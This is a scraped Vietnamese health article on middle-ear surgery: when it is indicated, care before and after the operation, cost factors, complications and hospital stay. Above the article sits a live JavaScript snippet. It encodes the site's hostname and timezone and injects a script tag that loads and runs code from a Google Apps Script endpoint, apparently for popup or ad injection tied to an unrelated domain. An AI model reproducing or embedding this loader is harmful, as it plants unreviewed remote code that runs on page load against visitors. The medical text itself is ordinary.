var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Phẫu thuật viêm tai giữa: Đối tượng chỉ định mổ và chi phí bao nhiêu

Đa phần các trường hợp viêm tai giữa đều có thể khỏi bệnh mà không cần can thiệp phẫu thuật. Tuy nhiên, một số trường hợp được chỉ định phẫu thuật viêm tai giữa để tránh các biến chứng không mong muốn, gây ảnh hưởng nghiêm trọng đến cuộc sống và sự phát triển của người bệnh.

Các biến chứng của viêm tai giữa cần phải phẫu thuật

Bác sĩ Trần Phương Thanh, Khoa Tai Mũi Họng, Bệnh viện Đa khoa Tâm Anh cảnh báo một số biến chứng viêm tai giữa cần phẫu thuật bao gồm:

    • Thủng màng nhĩ hoặc nhiễm trùng tai là nguyên nhân gây mất thính lực ở người bị viêm tai giữa, làm ảnh hưởng đến quá trình tiếp thu và phát triển ngôn ngữ, nhất là ở trẻ nhỏ.
    • Chảy mủ: người bị viêm tai giữa mủ cấp tính hoặc đã được điều trị bằng thuốc không hiệu quả.
    • Tai có cholesteatoma, một dạng biểu mô do viêm tai giữa mạn tính gây ra. Các khối cholesteatoma này có kích thước lớn dần theo thời gian, gây ảnh hưởng đến xương tay và có thể làm mất thính lực vĩnh viễn.
    • Viêm tai giữa gây viêm xương chũm mạn tính
mổ viêm tai giữa có nguy hiểm không
Viêm tai giữa nếu không phát hiện và điều trị kịp thời có nguy cơ xuất hiện các biến chứng khó lường

Chỉ định phẫu thuật viêm tai giữa

Bác sĩ sẽ đưa ra chỉ định phẫu thuật viêm tai giữa đối với các trường hợp cụ thể như sau:

1. Đối với viêm tai giữa mạn tính

Bác sĩ có thể chỉ định mổ viêm tai giữa bằng phương pháp vá màng nhĩ đơn thuần đối với trường hợp viêm tai giữa mạn tính kèm theo thủng màng nhĩ và không có bệnh tích về xương.(1)

2. Đối với viêm tai giữa chảy mủ tai

Trong trường hợp viêm tai giữa kèm theo cholesteatoma và viêm xương chũm mạn tính hoặc xuất hiện các biến chứng như biến chứng nội sọ do tai, thủng màng nhĩ, tái phát nhiều lần, bác sĩ sẽ chỉ định phẫu thuật để ngăn ngừa các biến chứng, bảo tồn thính lực..(2)

3. Đối với viêm tai giữa cấp tính

Khi điều trị viêm tai giữa bằng phương pháp nội khoa không làm giảm tình trạng nhiễm trùng hoặc người bệnh bị viêm tai giữa tái phát nhiều lần, hoặc tình trạng viêm tai giữa ứ dịch kéo dài nhất là ở trẻ em, bác sĩ có thể chỉ phẫu thuật bằng các phương pháp:

    • Nạo VA: khi VA bị nhiễm trùng hoặc phì đại
    • Phẫu thuật đặt ống thông khí: các ống nhỏ được chèn vào tai trẻ để dẫn không khí và dịch từ tai giữa ra bên ngoài

Làm gì khi phẫu thuật?

Để quá trình phẫu thuật đạt hiệu quả cao, người bệnh cần chú ý những việc cần làm trước và sau khi phẫu thuật.(3)

1. Trước phẫu thuật

Trước khi tiến hành mổ viêm tai giữa, người bệnh cần:

    • Làm các xét nghiệm tiền phẫu theo chỉ định của bác sĩ
    • Trị liệu cho tai khô trước mổ
    • Đánh giá thính lực
    • Gội đầu sạch sẽ trước thời gian mổ một ngày

2. Sau phẫu thuật

Sau khi hoàn tất quá trình phẫu thuật viêm tai giữa, người bệnh nên:

    • Báo ngay với bác sĩ nếu xuất hiện dấu hiệu nhức tai, nhức đầu
    • Thay băng mỗi ngày
    • Cắt chỉ sau tai sau 7 ngày phẫu thuật
    • Điều trị nội khoa khi có các triệu chứng chóng mặt, nôn ói
    • Chỉ được tháo băng tai toàn bộ sau 15 ngày kể từ ngày phẫu thuật vá nhĩ
mổ viêm tai giữa nằm viện bao lâu
Áp dụng phương pháp điều trị ngoại khoa cho người bị viêm tai giữa

Câu hỏi thắc mắc về mổ viêm tai giữa

1. Tại sao viêm tai giữa dễ tái phát?

Viêm tai giữa dễ tái phát vì những lý do sau đây:

    • Không phát hiện bệnh từ sớm, khiến bệnh vào giai đoạn muộn, tiến triển nặng và khó điều trị
    • Tự mua thuốc uống, dẫn đến điều trị không đúng cách
    • Không điều trị triệt để, cụ thể là ngừng thuốc khi thấy hết triệu chứng, không tuân thủ theo chỉ định của bác sĩ, khiến bệnh nhanh tái phát
    • Chăm sóc người bệnh không đúng cách, không tái khám định kỳ theo chỉ định cũng như không thực hiện đúng các lưu ý của bác sĩ trong phòng ngừa bệnh tái phát

2. Chi phí phẫu thuật viêm tai giữa có đắt không?

Với sự phát triển của ngành y học, các phương pháp phẫu thuật viêm tai giữa ngày càng mang lại nhiều ưu điểm nổi bật như hiệu quả cao, an toàn, rút ngắn thời gian điều trị, hồi phục nhanh và tiết kiệm chi phí. Tuy nhiên, rất khó để biết chính xác chi phí phẫu thuật viêm tai giữa vì mỗi trường hợp sẽ có hướng điều trị khác nhau và phụ thuộc vào nhiều yếu tố:

    • Mức độ viêm: viêm tai giữa chưa xuất hiện biến chứng sẽ dễ dàng hơn cho quá trình phẫu thuật so với các trường hợp có biến chứng như thủng màng nhĩ hay có cholesteatoma nên chi phí điều trị cũng sẽ thấp hơn.
    • Phương pháp phẫu thuật: các phương pháp phẫu thuật hiện đại, tiên tiến sẽ có chi phí cao hơn các phương pháp truyền thống nhưng mang lại hiệu quả cao, đảm bảo an toàn và nhanh phục hồi.
    • Cơ sở y tế điều trị: tùy thuộc vào từng địa chỉ điều trị bệnh mà chi phí sẽ có phần khác nhau, cụ thể là những nơi có đội ngũ bác sĩ giàu kinh nghiệm, trang thiết bị hiện đại sẽ có giá thành cao hơn so với những cơ sở y tế khác.

Do đó, người bệnh cần liên hệ với cơ sở y tế thăm khám và dự định điều trị bệnh để được tư vấn chính xác và chi tiết về chi phí phẫu thuật.

3. Có biến chứng sau phẫu thuật viêm tai giữa không?

Sẽ tốt hơn nếu viêm tai giữa không để lại bất kỳ biến chứng nào trong quá trình điều trị nhưng nếu có, người bệnh có thể gặp phải các biến chứng sau phẫu thuật viêm tai giữa như sau:

    • Nhiễm trùng tai tái phát
    • Mất thính lực tạm thời
    • Chậm nói (ở trẻ em bị nhiễm trùng tai tái phát)
    • Một số ít trường hợp có thể xảy ra biến chứng viêm xương chũm hoặc viêm màng não

4. Mổ viêm tai giữa nằm viện bao lâu?

Tùy thuộc vào từng trường hợp điều trị mà thời gian nằm viện sẽ khác nhau. Các trường hợp nhẹ chỉ mổ nội soi có thể xuất viện sau 24 giờ, các trường hợp nặng hơn cần nằm viện từ 5-7 ngày để theo dõi. Người bệnh sẽ phục hồi từ 2-3 tuần sau phẫu thuật.(4)

Sau khi xuất viện, người bệnh cần thực hiện đúng theo chỉ định của bác sĩ, đặc biệt là chăm sóc tai đúng cách, uống thuốc theo đơn để nhanh phục hồi. Đồng thời, nếu có bất kỳ triệu chứng bất thường nào, người bệnh cần liên hệ ngay cho bác sĩ để kịp thời xử lý.

Viêm tai giữa là bệnh lý phổ biến, nhất là ở trẻ nhỏ. Vì thế, phụ huynh nên đặc biệt chú ý, ngay khi phát hiện trẻ có dấu hiệu của bệnh, hãy nhanh chóng đưa trẻ đến Bệnh viện Đa khoa Tâm Anh để được thăm khám và điều trị kịp thời, tránh các biến chứng khó lường.

Phương pháp phẫu thuật viêm tai giữa mang lại hiệu quả cho việc điều trị bệnh viêm tai giữa, cần lưu ý chăm sóc người bệnh sau khi mổ viêm tai giữa. Chú ý vệ sinh vết mổ hàng ngày bằng thuốc sát trùng, tránh nước vào tai, tái khám theo lịch hẹn với bác sĩ.